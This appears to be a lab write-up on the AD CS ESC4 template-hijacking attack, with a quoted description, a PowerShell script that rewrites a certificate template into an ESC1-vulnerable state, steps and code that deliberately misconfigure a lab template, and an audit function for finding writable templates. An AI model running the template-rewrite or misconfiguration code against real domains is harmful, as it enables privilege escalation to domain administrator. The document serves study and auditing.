ESC4

Template Hijacking

Description

"ESC4, or Template Hijacking, occurs when an attacker gains permissions to modify a certificate template object stored in Active Directory. Certificate templates are AD objects residing in the Configuration Naming Context (under CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=...) and are protected by ACLs. If an attacker obtains Write access - such as WriteDACL (to change permissions), WriteOwner (to take ownership and then change permissions), specific WriteProperty rights on critical attributes, or FullControl - over a template object, they can alter its configuration. This modification can turn a previously secure template into one vulnerable to other attack scenarios, most commonly ESC1 (Enrollee-Supplied Subject for Client Authentication) or ESC2 (Any Purpose Certificate).

For example, an attacker with such permissions could maliciously modify a template to:

  • Grant enrollment rights on the template to themselves or a broad group like "Domain Users".

  • Enable the "Enrollee Supplies Subject" setting (set the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag).

  • Add a "Client Authentication" or "Any Purpose" EKU.

  • Remove security controls like "CA certificate manager approval" or the requirement for authorized signatures.

Once the template is reconfigured into a vulnerable state, the attacker (or anyone now permitted by the modified template) can enroll for a certificate, potentially specifying a privileged identity and thereby impersonating an administrator. This makes ESC4 an indirect but highly effective privilege escalation vector, as it allows an attacker to create the conditions for other AD CS exploits.

By default, only high-privilege groups like "Enterprise Admins" can create and modify certificate templates. However, misconfigurations in AD permissions or improper delegation of rights on template objects can expose this attack surface to less privileged users.

It's important to note that ESC4 abuse focuses on modifying the template object's attributes in AD. An attacker cannot use ESC4 to make a CA start issuing certificates based on a template if that template is not already enabled on the CA. Enabling or disabling which templates a CA offers is typically an ESC7-level action, requiring Manage CA rights on the CA object itself. Certipy's find command correlates templates defined in AD with the CAs that publish them (visible in the "Certificate Authorities" field for a template). If a template is not published by any CA, modifying it via ESC4 will not directly lead to certificate issuance until it is also enabled on a CA." — Oliver Lyak
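The modifications listed in the quoted description, carried out with the RSAT ActiveDirectory module, followed by the publication check that the last paragraph warns about. This is an added example, not code from the original page, from Oliver Lyak or from Certipy; the template name ESC4, the choice of Authenticated Users as the principal that receives enrollment rights, and the assumption that the running account already holds write rights on the template object (the ESC4 precondition) are all assumptions.

```powershell
# Added example, not from the original page. Assumes the RSAT ActiveDirectory
# module and an account that already has write rights over the template object.
# The template name 'ESC4' is an assumption.
Import-Module ActiveDirectory

$TemplateName = 'ESC4'
$ConfigNC     = (Get-ADRootDSE).configurationNamingContext
$PkiBase      = "CN=Public Key Services,CN=Services,$ConfigNC"
$TemplateDN   = "CN=$TemplateName,CN=Certificate Templates,$PkiBase"

# Flag bits and OIDs from MS-CRTD / wincrypt.h
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # bit in msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x00000002   # bit in msPKI-Enrollment-Flag: "CA certificate manager approval"
$ClientAuthOid   = '1.3.6.1.5.5.7.3.2'
$EnrollRightGuid = [Guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment extended right

$props = 'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag', 'msPKI-RA-Signature', 'pKIExtendedKeyUsage'
$t = Get-ADObject -Identity $TemplateDN -Properties $props

# 1) enrollee supplies the subject  2) no manager approval
# 3) no authorized signatures        4) Client Authentication EKU present
$nameFlag   = [int]$t.'msPKI-Certificate-Name-Flag' -bor $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
$enrollFlag = [int]$t.'msPKI-Enrollment-Flag' -band (-bnot $CT_FLAG_PEND_ALL_REQUESTS)
$ekus = @($t.'pKIExtendedKeyUsage' | Where-Object { $_ })
if ($ekus -notcontains $ClientAuthOid) { $ekus += $ClientAuthOid }

Set-ADObject -Identity $TemplateDN -Replace @{
    'msPKI-Certificate-Name-Flag' = $nameFlag
    'msPKI-Enrollment-Flag'       = $enrollFlag
    'msPKI-RA-Signature'          = 0
    'pKIExtendedKeyUsage'         = $ekus
}

# 5) grant the Certificate-Enrollment extended right to Authenticated Users (S-1-5-11)
$acl    = Get-Acl -Path "AD:\$TemplateDN"
$sid    = [System.Security.Principal.SecurityIdentifier]'S-1-5-11'
$rights = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
$allow  = [System.Security.AccessControl.AccessControlType]::Allow
$ace    = New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $sid, $rights, $allow, $EnrollRightGuid
$acl.AddAccessRule($ace)
Set-Acl -Path "AD:\$TemplateDN" -AclObject $acl

# Caveat from the text: none of this yields a certificate unless a CA publishes the
# template. Each CA's pKIEnrollmentService object lists what it offers in certificateTemplates.
$publishers = Get-ADObject -SearchBase "CN=Enrollment Services,$PkiBase" `
    -LDAPFilter "(&(objectClass=pKIEnrollmentService)(certificateTemplates=$TemplateName))" `
    -Properties dNSHostName
if ($publishers) {
    $publishers | ForEach-Object { "Template '$TemplateName' is published by CA '$($_.Name)' on $($_.dNSHostName)" }
} else {
    Write-Warning "No CA publishes '$TemplateName'; enabling it on a CA needs Manage CA rights (ESC7)."
}
```

Run it as the low-privileged account that holds the write rights, not as an administrator, or the test proves nothing about the misconfiguration. Only the WriteProperty/WriteDacl/WriteOwner/GenericAll ACE on the template is needed for the attribute changes; the final ACL edit (granting enrollment) additionally requires WriteDacl or ownership, which is why the quoted text lists those rights separately.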

Configuration

Open the Certificate Templates Console (certtmpl.msc) and duplicate the "User" template once more. On the new template's Security tab, grant "Authenticated Users" Full Control.

Publish the new template on the CA (Certification Authority console, Certificate Templates > New > Certificate Template to Issue). Once it is published, the template is vulnerable to ESC4: any authenticated user can rewrite its settings and turn it into an ESC1-style template.
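The same configuration done from PowerShell instead of the console, followed by the check a practitioner would run to confirm the lab is in the intended state (and to audit a real forest for the same condition): every template whose ACL gives a broad group rights that allow rewriting the template or its ACL. This is an added example, not code from the original page; it assumes the duplicated template was saved under the name ESC4, that the RSAT ActiveDirectory module is installed, and that certutil runs on the CA host itself (otherwise add -config).

```powershell
# Added example, not from the original page. Assumes the RSAT ActiveDirectory
# module, a template saved as 'ESC4' (assumption) and an account allowed to edit
# template ACLs (Enterprise Admins by default).
Import-Module ActiveDirectory

$TemplateName = 'ESC4'
$ConfigNC     = (Get-ADRootDSE).configurationNamingContext
$TemplatesDN  = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$ConfigNC"
$TemplateDN   = "CN=$TemplateName,$TemplatesDN"

# --- Lab setup: "Authenticated Users: Full control" is a GenericAll ACE on the object ---
$acl    = Get-Acl -Path "AD:\$TemplateDN"
$sid    = [System.Security.Principal.SecurityIdentifier]'S-1-5-11'   # Authenticated Users
$rights = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
$allow  = [System.Security.AccessControl.AccessControlType]::Allow
$ace    = New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $sid, $rights, $allow
$acl.AddAccessRule($ace)
Set-Acl -Path "AD:\$TemplateDN" -AclObject $acl

# "Enable it": publish the template on the local CA. A writable but unpublished
# template does not yield certificates (see the ESC7 caveat above).
certutil -SetCATemplates "+$TemplateName"

# --- Check: which templates can low-privileged principals rewrite? ---
function Find-WritableTemplate {
    $domainSid = (Get-ADDomain).DomainSID.Value
    # Authenticated Users, Everyone, Domain Users, Domain Computers
    $broad = @('S-1-5-11', 'S-1-1-0', "$domainSid-513", "$domainSid-515")
    # WriteProperty (0x20) | WriteDacl (0x40000) | WriteOwner (0x80000); GenericAll and
    # GenericWrite both contain these bits, while read-only ACEs do not.
    $mask = 0x20 -bor 0x40000 -bor 0x80000

    foreach ($tpl in Get-ADObject -SearchBase $TemplatesDN -LDAPFilter '(objectClass=pKICertificateTemplate)') {
        $tplAcl = Get-Acl -Path "AD:\$($tpl.DistinguishedName)"
        foreach ($a in $tplAcl.Access) {
            if ($a.AccessControlType -ne 'Allow') { continue }
            if (([int]$a.ActiveDirectoryRights -band $mask) -eq 0) { continue }
            $aceSid = $a.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
            if ($broad -contains $aceSid) {
                [pscustomobject]@{
                    Template   = $tpl.Name
                    Principal  = $a.IdentityReference.Value
                    Rights     = $a.ActiveDirectoryRights
                    # All-zero GUID = right applies to the whole object. A WriteProperty ACE
                    # scoped to a single attribute is only dangerous on the critical ones
                    # (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, pKIExtendedKeyUsage, ...).
                    ObjectType = $a.ObjectType
                }
            }
        }
    }
}

Find-WritableTemplate | Format-Table -AutoSize
```

In the lab the output should contain exactly one row, the ESC4 template with Authenticated Users holding GenericAll. In production the same function is a quick ESC4 audit: anything it prints with an all-zero ObjectType is a template that the listed group can reconfigure at will.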

Written by ruycr4ft
